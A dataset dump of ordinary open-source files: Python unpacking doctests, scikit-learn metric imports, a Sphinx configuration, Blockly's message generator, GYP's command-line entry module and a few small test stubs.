repo_name stringlengths 5 100 | ref stringlengths 12 67 | path stringlengths 4 244 | copies stringlengths 1 8 | content stringlengths 0 1.05M ⌀ |
|---|---|---|---|---|
blacklin/kbengine | refs/heads/master | kbe/res/scripts/common/Lib/test/test_unpack.py | 174 | doctests = """
Unpack tuple
>>> t = (1, 2, 3)
>>> a, b, c = t
>>> a == 1 and b == 2 and c == 3
True
Unpack list
>>> l = [4, 5, 6]
>>> a, b, c = l
>>> a == 4 and b == 5 and c == 6
True
Unpack implied tuple
>>> a, b, c = 7, 8, 9
>>> a == 7 and b == 8 and c == 9
True
Unpack string... fun!
>>> a, b, c = 'one'
>>> a == 'o' and b == 'n' and c == 'e'
True
Unpack generic sequence
>>> class Seq:
... def __getitem__(self, i):
... if i >= 0 and i < 3: return i
... raise IndexError
...
>>> a, b, c = Seq()
>>> a == 0 and b == 1 and c == 2
True
Single element unpacking, with extra syntax
>>> st = (99,)
>>> sl = [100]
>>> a, = st
>>> a
99
>>> b, = sl
>>> b
100
Now for some failures
Unpacking non-sequence
>>> a, b, c = 7
Traceback (most recent call last):
...
TypeError: 'int' object is not iterable
Unpacking tuple of wrong size
>>> a, b = t
Traceback (most recent call last):
...
ValueError: too many values to unpack (expected 2)
Unpacking tuple of wrong size
>>> a, b = l
Traceback (most recent call last):
...
ValueError: too many values to unpack (expected 2)
Unpacking sequence too short
>>> a, b, c, d = Seq()
Traceback (most recent call last):
...
ValueError: need more than 3 values to unpack
Unpacking sequence too long
>>> a, b = Seq()
Traceback (most recent call last):
...
ValueError: too many values to unpack (expected 2)
Unpacking a sequence where the test for too long raises a different kind of
error
>>> class BozoError(Exception):
... pass
...
>>> class BadSeq:
... def __getitem__(self, i):
... if i >= 0 and i < 3:
... return i
... elif i == 3:
... raise BozoError
... else:
... raise IndexError
...
Trigger code while not expecting an IndexError (unpack sequence too long, wrong
error)
>>> a, b, c, d, e = BadSeq()
Traceback (most recent call last):
...
test.test_unpack.BozoError
Trigger code while expecting an IndexError (unpack sequence too short, wrong
error)
>>> a, b, c = BadSeq()
Traceback (most recent call last):
...
test.test_unpack.BozoError
"""
__test__ = {'doctests' : doctests}
def test_main(verbose=False):
from test import support
from test import test_unpack
support.run_doctest(test_unpack, verbose)
if __name__ == "__main__":
test_main(verbose=True)
|
rahuldhote/scikit-learn | refs/heads/master | sklearn/metrics/__init__.py | 214 | """
The :mod:`sklearn.metrics` module includes score functions, performance metrics
and pairwise metrics and distance computations.
"""
from .ranking import auc
from .ranking import average_precision_score
from .ranking import coverage_error
from .ranking import label_ranking_average_precision_score
from .ranking import label_ranking_loss
from .ranking import precision_recall_curve
from .ranking import roc_auc_score
from .ranking import roc_curve
from .classification import accuracy_score
from .classification import classification_report
from .classification import cohen_kappa_score
from .classification import confusion_matrix
from .classification import f1_score
from .classification import fbeta_score
from .classification import hamming_loss
from .classification import hinge_loss
from .classification import jaccard_similarity_score
from .classification import log_loss
from .classification import matthews_corrcoef
from .classification import precision_recall_fscore_support
from .classification import precision_score
from .classification import recall_score
from .classification import zero_one_loss
from .classification import brier_score_loss
from . import cluster
from .cluster import adjusted_mutual_info_score
from .cluster import adjusted_rand_score
from .cluster import completeness_score
from .cluster import consensus_score
from .cluster import homogeneity_completeness_v_measure
from .cluster import homogeneity_score
from .cluster import mutual_info_score
from .cluster import normalized_mutual_info_score
from .cluster import silhouette_samples
from .cluster import silhouette_score
from .cluster import v_measure_score
from .pairwise import euclidean_distances
from .pairwise import pairwise_distances
from .pairwise import pairwise_distances_argmin
from .pairwise import pairwise_distances_argmin_min
from .pairwise import pairwise_kernels
from .regression import explained_variance_score
from .regression import mean_absolute_error
from .regression import mean_squared_error
from .regression import median_absolute_error
from .regression import r2_score
from .scorer import make_scorer
from .scorer import SCORERS
from .scorer import get_scorer
__all__ = [
'accuracy_score',
'adjusted_mutual_info_score',
'adjusted_rand_score',
'auc',
'average_precision_score',
'classification_report',
'cluster',
'completeness_score',
'confusion_matrix',
'consensus_score',
'coverage_error',
'euclidean_distances',
'explained_variance_score',
'f1_score',
'fbeta_score',
'get_scorer',
'hamming_loss',
'hinge_loss',
'homogeneity_completeness_v_measure',
'homogeneity_score',
'jaccard_similarity_score',
'label_ranking_average_precision_score',
'label_ranking_loss',
'log_loss',
'make_scorer',
'matthews_corrcoef',
'mean_absolute_error',
'mean_squared_error',
'median_absolute_error',
'mutual_info_score',
'normalized_mutual_info_score',
'pairwise_distances',
'pairwise_distances_argmin',
'pairwise_distances_argmin_min',
'pairwise_distances_argmin_min',
'pairwise_kernels',
'precision_recall_curve',
'precision_recall_fscore_support',
'precision_score',
'r2_score',
'recall_score',
'roc_auc_score',
'roc_curve',
'SCORERS',
'silhouette_samples',
'silhouette_score',
'v_measure_score',
'zero_one_loss',
'brier_score_loss',
]
|
dslab-epfl/bugbase | refs/heads/master | doc/source/conf.py | 1 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Bugbase documentation build configuration file, created by
# sphinx-quickstart on Mon May 4 11:56:47 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import sphinx_rtd_theme
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))
sys.path.insert(0, os.path.abspath('../..'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.viewcode',
'sphinx.ext.intersphinx'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'Bugbase'
copyright = '2015, Benjamin Schubert, benjamin.schubert@epfl.ch'
author = 'Benjamin Schubert, benjamin.schubert@epfl.ch'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0'
# The full version, including alpha/beta/rc tags.
release = '1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
# html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'h', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'r', 'sv', 'tr'
# html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
# html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
# html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'Bugbasedoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
# 'preamble': '',
# Latex figure (float) alignment
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'Bugbase.tex', 'Bugbase Documentation',
'Benjamin Schubert, benjamin.schubert@epfl.ch', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'bugbase', 'Bugbase Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'Bugbase', 'Bugbase Documentation',
author, 'Bugbase', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
# texinfo_no_detailmenu = False
rst_epilog = """.. |project| replace:: {0}""".format(project)
|
CptDemocracy/Python | refs/heads/master | MITx-6.00.1x-EDX-Introduction-to-Computer-Science/Week-2/Lecture-3/problem5a.py | 1 | """
Problem 5a.
In this problem you'll be given a chance to practice writing
some for loops.
Convert the following code into code that uses a for loop:
print 2
print 4
print 6
print 8
print 10
print "Goodbye!"
"""
for n in range(2, 11, 2):
print str(n)
print 'Goodbye!'
|
mbrinkmeier/AbbozzaCore | refs/heads/master | build/classes/js/lib/blockly/i18n/create_messages.py | 128 | #!/usr/bin/python
# Generate .js files defining Blockly core and language messages.
#
# Copyright 2013 Google Inc.
# https://developers.google.com/blockly/
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import codecs
import os
import re
import sys
from common import read_json_file
_NEWLINE_PATTERN = re.compile('[\n\r]')
def string_is_ascii(s):
try:
s.decode('ascii')
return True
except UnicodeEncodeError:
return False
def main():
"""Generate .js files defining Blockly core and language messages."""
# Process command-line arguments.
parser = argparse.ArgumentParser(description='Convert JSON files to JS.')
parser.add_argument('--source_lang', default='en',
help='ISO 639-1 source language code')
parser.add_argument('--source_lang_file',
default=os.path.join('json', 'en.json'),
help='Path to .json file for source language')
parser.add_argument('--source_synonym_file',
default=os.path.join('json', 'synonyms.json'),
help='Path to .json file with synonym definitions')
parser.add_argument('--output_dir', default='js/',
help='relative directory for output files')
parser.add_argument('--key_file', default='keys.json',
help='relative path to input keys file')
parser.add_argument('--quiet', action='store_true', default=False,
help='do not write anything to standard output')
parser.add_argument('files', nargs='+', help='input files')
args = parser.parse_args()
if not args.output_dir.endswith(os.path.sep):
args.output_dir += os.path.sep
# Read in source language .json file, which provides any values missing
# in target languages' .json files.
source_defs = read_json_file(os.path.join(os.curdir, args.source_lang_file))
# Make sure the source file doesn't contain a newline or carriage return.
for key, value in source_defs.items():
if _NEWLINE_PATTERN.search(value):
print('ERROR: definition of {0} in {1} contained a newline character.'.
format(key, args.source_lang_file))
sys.exit(1)
sorted_keys = source_defs.keys()
sorted_keys.sort()
# Read in synonyms file, which must be output in every language.
synonym_defs = read_json_file(os.path.join(
os.curdir, args.source_synonym_file))
synonym_text = '\n'.join(['Blockly.Msg.{0} = Blockly.Msg.{1};'.format(
key, synonym_defs[key]) for key in synonym_defs])
# Create each output file.
for arg_file in args.files:
(_, filename) = os.path.split(arg_file)
target_lang = filename[:filename.index('.')]
if target_lang not in ('qqq', 'keys', 'synonyms'):
target_defs = read_json_file(os.path.join(os.curdir, arg_file))
# Verify that keys are 'ascii'
bad_keys = [key for key in target_defs if not string_is_ascii(key)]
if bad_keys:
print(u'These keys in {0} contain non ascii characters: {1}'.format(
filename, ', '.join(bad_keys)))
# If there's a '\n' or '\r', remove it and print a warning.
for key, value in target_defs.items():
if _NEWLINE_PATTERN.search(value):
print(u'WARNING: definition of {0} in {1} contained '
'a newline character.'.
format(key, arg_file))
target_defs[key] = _NEWLINE_PATTERN.sub(' ', value)
# Output file.
outname = os.path.join(os.curdir, args.output_dir, target_lang + '.js')
with codecs.open(outname, 'w', 'utf-8') as outfile:
outfile.write(
"""// This file was automatically generated. Do not modify.
'use strict';
goog.provide('Blockly.Msg.{0}');
goog.require('Blockly.Msg');
""".format(target_lang.replace('-', '.')))
# For each key in the source language file, output the target value
# if present; otherwise, output the source language value with a
# warning comment.
for key in sorted_keys:
if key in target_defs:
value = target_defs[key]
comment = ''
del target_defs[key]
else:
value = source_defs[key]
comment = ' // untranslated'
value = value.replace('"', '\\"')
outfile.write(u'Blockly.Msg.{0} = "{1}";{2}\n'.format(
key, value, comment))
# Announce any keys defined only for target language.
if target_defs:
extra_keys = [key for key in target_defs if key not in synonym_defs]
synonym_keys = [key for key in target_defs if key in synonym_defs]
if not args.quiet:
if extra_keys:
print(u'These extra keys appeared in {0}: {1}'.format(
filename, ', '.join(extra_keys)))
if synonym_keys:
print(u'These synonym keys appeared in {0}: {1}'.format(
filename, ', '.join(synonym_keys)))
outfile.write(synonym_text)
if not args.quiet:
print('Created {0}.'.format(outname))
if __name__ == '__main__':
main()
|
zhengyongbo/phantomjs | refs/heads/master | src/breakpad/src/tools/gyp/pylib/gyp/__init__.py | 137 | #!/usr/bin/python
# Copyright (c) 2009 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import copy
import gyp.input
import optparse
import os.path
import re
import shlex
import sys
# Default debug modes for GYP
debug = {}
# List of "official" debug modes, but you can use anything you like.
DEBUG_GENERAL = 'general'
DEBUG_VARIABLES = 'variables'
DEBUG_INCLUDES = 'includes'
def DebugOutput(mode, message):
if mode in gyp.debug.keys():
print "%s: %s" % (mode.upper(), message)
def FindBuildFiles():
extension = '.gyp'
files = os.listdir(os.getcwd())
build_files = []
for file in files:
if file[-len(extension):] == extension:
build_files.append(file)
return build_files
def Load(build_files, format, default_variables={},
includes=[], depth='.', params={}, check=False):
"""
Loads one or more specified build files.
default_variables and includes will be copied before use.
Returns the generator for the specified format and the
data returned by loading the specified build files.
"""
default_variables = copy.copy(default_variables)
# Default variables provided by this program and its modules should be
# named WITH_CAPITAL_LETTERS to provide a distinct "best practice" namespace,
# avoiding collisions with user and automatic variables.
default_variables['GENERATOR'] = format
generator_name = 'gyp.generator.' + format
# These parameters are passed in order (as opposed to by key)
# because ActivePython cannot handle key parameters to __import__.
generator = __import__(generator_name, globals(), locals(), generator_name)
default_variables.update(generator.generator_default_variables)
# Give the generator the opportunity to set additional variables based on
# the params it will receive in the output phase.
if getattr(generator, 'CalculateVariables', None):
generator.CalculateVariables(default_variables, params)
# Fetch the generator specific info that gets fed to input, we use getattr
# so we can default things and the generators only have to provide what
# they need.
generator_input_info = {
'generator_wants_absolute_build_file_paths':
getattr(generator, 'generator_wants_absolute_build_file_paths', False),
'generator_handles_variants':
getattr(generator, 'generator_handles_variants', False),
'non_configuration_keys':
getattr(generator, 'generator_additional_non_configuration_keys', []),
'path_sections':
getattr(generator, 'generator_additional_path_sections', []),
'extra_sources_for_rules':
getattr(generator, 'generator_extra_sources_for_rules', []),
'generator_supports_multiple_toolsets':
getattr(generator, 'generator_supports_multiple_toolsets', False),
}
# Process the input specific to this generator.
result = gyp.input.Load(build_files, default_variables, includes[:],
depth, generator_input_info, check)
return [generator] + result
def NameValueListToDict(name_value_list):
"""
Takes an array of strings of the form 'NAME=VALUE' and creates a dictionary
of the pairs. If a string is simply NAME, then the value in the dictionary
is set to True. If VALUE can be converted to an integer, it is.
"""
result = { }
for item in name_value_list:
tokens = item.split('=', 1)
if len(tokens) == 2:
# If we can make it an int, use that, otherwise, use the string.
try:
token_value = int(tokens[1])
except ValueError:
token_value = tokens[1]
# Set the variable to the supplied value.
result[tokens[0]] = token_value
else:
# No value supplied, treat it as a boolean and set it.
result[tokens[0]] = True
return result
def ShlexEnv(env_name):
flags = os.environ.get(env_name, [])
if flags:
flags = shlex.split(flags)
return flags
def FormatOpt(opt, value):
if opt.startswith('--'):
return '%s=%s' % (opt, value)
return opt + value
def RegenerateAppendFlag(flag, values, predicate, env_name, options):
"""Regenerate a list of command line flags, for an option of action='append'.
The |env_name|, if given, is checked in the environment and used to generate
an initial list of options, then the options that were specified on the
command line (given in |values|) are appended. This matches the handling of
environment variables and command line flags where command line flags override
the environment, while not requiring the environment to be set when the flags
are used again.
"""
flags = []
if options.use_environment and env_name:
for flag_value in ShlexEnv(env_name):
flags.append(FormatOpt(flag, predicate(flag_value)))
if values:
for flag_value in values:
flags.append(FormatOpt(flag, predicate(flag_value)))
return flags
def RegenerateFlags(options):
"""Given a parsed options object, and taking the environment variables into
account, returns a list of flags that should regenerate an equivalent options
object (even in the absence of the environment variables.)
Any path options will be normalized relative to depth.
The format flag is not included, as it is assumed the calling generator will
set that as appropriate.
"""
def FixPath(path):
path = gyp.common.FixIfRelativePath(path, options.depth)
if not path:
return os.path.curdir
return path
def Noop(value):
return value
# We always want to ignore the environment when regenerating, to avoid
# duplicate or changed flags in the environment at the time of regeneration.
flags = ['--ignore-environment']
for name, metadata in options._regeneration_metadata.iteritems():
opt = metadata['opt']
value = getattr(options, name)
value_predicate = metadata['type'] == 'path' and FixPath or Noop
action = metadata['action']
env_name = metadata['env_name']
if action == 'append':
flags.extend(RegenerateAppendFlag(opt, value, value_predicate,
env_name, options))
elif action in ('store', None): # None is a synonym for 'store'.
if value:
flags.append(FormatOpt(opt, value_predicate(value)))
elif options.use_environment and env_name and os.environ.get(env_name):
flags.append(FormatOpt(opt, value_predicate(os.environ.get(env_name))))
elif action in ('store_true', 'store_false'):
if ((action == 'store_true' and value) or
(action == 'store_false' and not value)):
flags.append(opt)
elif options.use_environment and env_name:
print >>sys.stderr, ('Warning: environment regeneration unimplemented '
'for %s flag %r env_name %r' % (action, opt,
env_name))
else:
print >>sys.stderr, ('Warning: regeneration unimplemented for action %r '
'flag %r' % (action, opt))
return flags
class RegeneratableOptionParser(optparse.OptionParser):
def __init__(self):
self.__regeneratable_options = {}
optparse.OptionParser.__init__(self)
def add_option(self, *args, **kw):
"""Add an option to the parser.
This accepts the same arguments as OptionParser.add_option, plus the
following:
regenerate: can be set to False to prevent this option from being included
in regeneration.
env_name: name of environment variable that additional values for this
option come from.
type: adds type='path', to tell the regenerator that the values of
this option need to be made relative to options.depth
"""
env_name = kw.pop('env_name', None)
if 'dest' in kw and kw.pop('regenerate', True):
dest = kw['dest']
# The path type is needed for regenerating, for optparse we can just treat
# it as a string.
type = kw.get('type')
if type == 'path':
kw['type'] = 'string'
self.__regeneratable_options[dest] = {
'action': kw.get('action'),
'type': type,
'env_name': env_name,
'opt': args[0],
}
optparse.OptionParser.add_option(self, *args, **kw)
def parse_args(self, *args):
values, args = optparse.OptionParser.parse_args(self, *args)
values._regeneration_metadata = self.__regeneratable_options
return values, args
def main(args):
my_name = os.path.basename(sys.argv[0])
parser = RegeneratableOptionParser()
usage = 'usage: %s [options ...] [build_file ...]'
parser.set_usage(usage.replace('%s', '%prog'))
parser.add_option('-D', dest='defines', action='append', metavar='VAR=VAL',
env_name='GYP_DEFINES',
help='sets variable VAR to value VAL')
parser.add_option('-f', '--format', dest='formats', action='append',
env_name='GYP_GENERATORS', regenerate=False,
help='output formats to generate')
parser.add_option('--msvs-version', dest='msvs_version',
regenerate=False,
help='Deprecated; use -G msvs_version=MSVS_VERSION instead')
parser.add_option('-I', '--include', dest='includes', action='append',
metavar='INCLUDE', type='path',
help='files to include in all loaded .gyp files')
parser.add_option('--depth', dest='depth', metavar='PATH', type='path',
help='set DEPTH gyp variable to a relative path to PATH')
parser.add_option('-d', '--debug', dest='debug', metavar='DEBUGMODE',
action='append', default=[], help='turn on a debugging '
'mode for debugging GYP. Supported modes are "variables" '
'and "general"')
parser.add_option('-S', '--suffix', dest='suffix', default='',
help='suffix to add to generated files')
parser.add_option('-G', dest='generator_flags', action='append', default=[],
metavar='FLAG=VAL', env_name='GYP_GENERATOR_FLAGS',
help='sets generator flag FLAG to VAL')
parser.add_option('--generator-output', dest='generator_output',
action='store', default=None, metavar='DIR', type='path',
env_name='GYP_GENERATOR_OUTPUT',
help='puts generated build files under DIR')
parser.add_option('--ignore-environment', dest='use_environment',
action='store_false', default=True, regenerate=False,
help='do not read options from environment variables')
parser.add_option('--check', dest='check', action='store_true',
help='check format of gyp files')
# We read a few things from ~/.gyp, so set up a var for that.
home_vars = ['HOME']
if sys.platform in ('cygwin', 'win32'):
home_vars.append('USERPROFILE')
home = None
for home_var in home_vars:
home = os.getenv(home_var)
if home != None:
break
home_dot_gyp = None
if home != None:
home_dot_gyp = os.path.join(home, '.gyp')
if not os.path.exists(home_dot_gyp):
home_dot_gyp = None
# TODO(thomasvl): add support for ~/.gyp/defaults
(options, build_files_arg) = parser.parse_args(args)
build_files = build_files_arg
if not options.formats:
# If no format was given on the command line, then check the env variable.
generate_formats = []
if options.use_environment:
generate_formats = os.environ.get('GYP_GENERATORS', [])
if generate_formats:
generate_formats = re.split('[\s,]', generate_formats)
if generate_formats:
options.formats = generate_formats
else:
# Nothing in the variable, default based on platform.
options.formats = [ {'darwin': 'xcode',
'win32': 'msvs',
'cygwin': 'msvs',
'freebsd7': 'make',
'freebsd8': 'make',
'linux2': 'scons',}[sys.platform] ]
if not options.generator_output and options.use_environment:
g_o = os.environ.get('GYP_GENERATOR_OUTPUT')
if g_o:
options.generator_output = g_o
for mode in options.debug:
gyp.debug[mode] = 1
# Do an extra check to avoid work when we're not debugging.
if DEBUG_GENERAL in gyp.debug.keys():
DebugOutput(DEBUG_GENERAL, 'running with these options:')
for (option, value) in options.__dict__.items():
if option[0] == '_':
continue
if isinstance(value, basestring):
DebugOutput(DEBUG_GENERAL, " %s: '%s'" % (option, value))
else:
DebugOutput(DEBUG_GENERAL, " %s: %s" % (option, str(value)))
if not build_files:
build_files = FindBuildFiles()
if not build_files:
print >>sys.stderr, (usage + '\n\n%s: error: no build_file') % \
(my_name, my_name)
return 1
# TODO(mark): Chromium-specific hack!
# For Chromium, the gyp "depth" variable should always be a relative path
# to Chromium's top-level "src" directory. If no depth variable was set
# on the command line, try to find a "src" directory by looking at the
# absolute path to each build file's directory. The first "src" component
# found will be treated as though it were the path used for --depth.
if not options.depth:
for build_file in build_files:
build_file_dir = os.path.abspath(os.path.dirname(build_file))
build_file_dir_components = build_file_dir.split(os.path.sep)
components_len = len(build_file_dir_components)
for index in xrange(components_len - 1, -1, -1):
if build_file_dir_components[index] == 'src':
options.depth = os.path.sep.join(build_file_dir_components)
break
del build_file_dir_components[index]
# If the inner loop found something, break without advancing to another
# build file.
if options.depth:
break
if not options.depth:
raise Exception, \
'Could not automatically locate src directory. This is a ' + \
'temporary Chromium feature that will be removed. Use ' + \
'--depth as a workaround.'
# -D on the command line sets variable defaults - D isn't just for define,
# it's for default. Perhaps there should be a way to force (-F?) a
# variable's value so that it can't be overridden by anything else.
cmdline_default_variables = {}
defines = []
if options.use_environment:
defines += ShlexEnv('GYP_DEFINES')
if options.defines:
defines += options.defines
cmdline_default_variables = NameValueListToDict(defines)
if DEBUG_GENERAL in gyp.debug.keys():
DebugOutput(DEBUG_GENERAL,
"cmdline_default_variables: %s" % cmdline_default_variables)
# Set up includes.
includes = []
# If ~/.gyp/include.gypi exists, it'll be forcibly included into every
# .gyp file that's loaded, before anything else is included.
if home_dot_gyp != None:
default_include = os.path.join(home_dot_gyp, 'include.gypi')
if os.path.exists(default_include):
includes.append(default_include)
# Command-line --include files come after the default include.
if options.includes:
includes.extend(options.includes)
# Generator flags should be prefixed with the target generator since they
# are global across all generator runs.
gen_flags = []
if options.use_environment:
gen_flags += ShlexEnv('GYP_GENERATOR_FLAGS')
if options.generator_flags:
gen_flags += options.generator_flags
generator_flags = NameValueListToDict(gen_flags)
if DEBUG_GENERAL in gyp.debug.keys():
DebugOutput(DEBUG_GENERAL, "generator_flags: %s" % generator_flags)
# TODO: Remove this and the option after we've gotten folks to move to the
# generator flag.
if options.msvs_version:
print >>sys.stderr, \
'DEPRECATED: Use generator flag (-G msvs_version=' + \
options.msvs_version + ') instead of --msvs-version=' + \
options.msvs_version
generator_flags['msvs_version'] = options.msvs_version
# Generate all requested formats (use a set in case we got one format request
# twice)
for format in set(options.formats):
params = {'options': options,
'build_files': build_files,
'generator_flags': generator_flags,
'cwd': os.getcwd(),
'build_files_arg': build_files_arg,
'gyp_binary': sys.argv[0],
'home_dot_gyp': home_dot_gyp}
# Start with the default variables from the command line.
[generator, flat_list, targets, data] = Load(build_files, format,
cmdline_default_variables,
includes, options.depth,
params, options.check)
# TODO(mark): Pass |data| for now because the generator needs a list of
# build files that came in. In the future, maybe it should just accept
# a list, and not the whole data dict.
# NOTE: flat_list is the flattened dependency graph specifying the order
# that targets may be built. Build systems that operate serially or that
# need to have dependencies defined before dependents reference them should
# generate targets in the order specified in flat_list.
generator.GenerateOutput(flat_list, targets, data, params)
# Done
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
ycsoft/FatCat-Server | refs/heads/master | LIBS/boost_1_58_0/libs/python/test/operators_wrapper.py | 12 | from operators_wrapper_ext import *
class D2(vector): pass
d2 = D2()
for lhs in (v,d,d2):
-lhs
for rhs in (v,d,d2):
lhs + rhs
lhs += rhs
|
toontownfunserver/Panda3D-1.9.0 | refs/heads/master | direct/gui/__init__.py | 12133432 | |
tushar7795/MicroBlog | refs/heads/master | flask/lib/python2.7/site-packages/wtforms/ext/i18n/__init__.py | 12133432 | |
sergiocorato/odoomrp-wip | refs/heads/8.0 | stock_quant_manual_assign_without_lock_lot/tests/test_stock_quant_manual_assign_without_lock_lot.py | 5 | # -*- coding: utf-8 -*-
# Copyright © 2017 Ainara Galdona - AvanzOSC
# License AGPL-3 - See http://www.gnu.org/licenses/agpl-3.0.html
from openerp.addons.stock_quant_manual_assign.tests\
.test_stock_quant_manual_assign import TestStockQuantManualAssign
from openerp.tests.common import at_install, post_install
@at_install(False)
@post_install(True)
class TestStockQuantManualAssignWithoutLockLot(TestStockQuantManualAssign):
def setUp(self):
super(TestStockQuantManualAssignWithoutLockLot, self).setUp()
|
zbal/ansible | refs/heads/devel | test/units/parsing/test_unquote.py | 152 | # coding: utf-8
# (c) 2015, Toshio Kuratomi <tkuratomi@ansible.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
